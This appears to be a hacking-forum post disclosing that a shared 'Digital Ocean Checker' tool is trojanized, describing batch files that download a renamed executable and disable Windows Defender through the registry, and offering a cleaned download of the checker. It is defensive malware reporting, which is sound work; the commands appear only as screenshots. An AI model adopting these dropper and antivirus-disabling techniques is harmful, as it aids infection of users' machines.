[Scan Report & Debloated download]: Digital Ocean Checker by Redey (shared by Betski) 06-07-2020, 03:27 PM
#1
Thanks to @HailHydra, this woudn't have been revealed without him notifiying me about Betski's software posts
When loading the executable, it will unpack in a folder (%appdata%), here are the files extracted by the application
![[Image: QGU15XfxQD6Tk_S2D-eHIg.png]](https://image.prntscr.com/image/QGU15XfxQD6Tk_S2D-eHIg.png)
wof.bat is where the malware gets downloaded, via this command
![[Image: mnypDoNhSQ_0JvLHJOmM-Q.png]](https://image.prntscr.com/image/mnypDoNhSQ_0JvLHJOmM-Q.png)
av.bat tries to disable Windows Defender via the regedit
![[Image: pUZRdH9TRMWx_JMq_VqN0w.png]](https://image.prntscr.com/image/pUZRdH9TRMWx_JMq_VqN0w.png)
i haven't been able to decompile test.exe, however, it has a lot of detections on virustotal and browsing through it via MiTeC EXE Explorer shows a interactions with the "Downloads" folder
![[Image: ONYozkooS52GBQ9VBazlDg.png]](https://image.prntscr.com/image/ONYozkooS52GBQ9VBazlDg.png)
The file that gets downloaded (Systemas.exe) can't be downloaded anymore, so i can't go further, however, the script renames it a System32.exe, which is a supicious file name
![[Image: safv3U-9S3a4uLoCGCouWw.png]](https://image.prntscr.com/image/safv3U-9S3a4uLoCGCouWw.png)
The thread was released 1 day after the edits on the application has been made (containing the malwares)
![[Image: CmiO2CeMR2yl3xFY0IpWOQ.png]](https://image.prntscr.com/image/CmiO2CeMR2yl3xFY0IpWOQ.png)
![[Image: rUlijW36QIKIbILU3-WdtQ.png]](https://image.prntscr.com/image/rUlijW36QIKIbILU3-WdtQ.png)
here's a download link with only the standalone application:
Files (1):
When loading the executable, it will unpack in a folder (%appdata%), here are the files extracted by the application
wof.bat is where the malware gets downloaded, via this command
av.bat tries to disable Windows Defender via the regedit
i haven't been able to decompile test.exe, however, it has a lot of detections on virustotal and browsing through it via MiTeC EXE Explorer shows a interactions with the "Downloads" folder
The file that gets downloaded (Systemas.exe) can't be downloaded anymore, so i can't go further, however, the script renames it a System32.exe, which is a supicious file name
The thread was released 1 day after the edits on the application has been made (containing the malwares)
here's a download link with only the standalone application:
Files (1):
Code:
Redeye Digital Ocean Checker.exe | 1.4mb
(This post was last modified: 06-07-2020, 03:30 PM by miso.)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
![[Image: AD83g1A.png]](http://i.imgur.com/AD83g1A.png)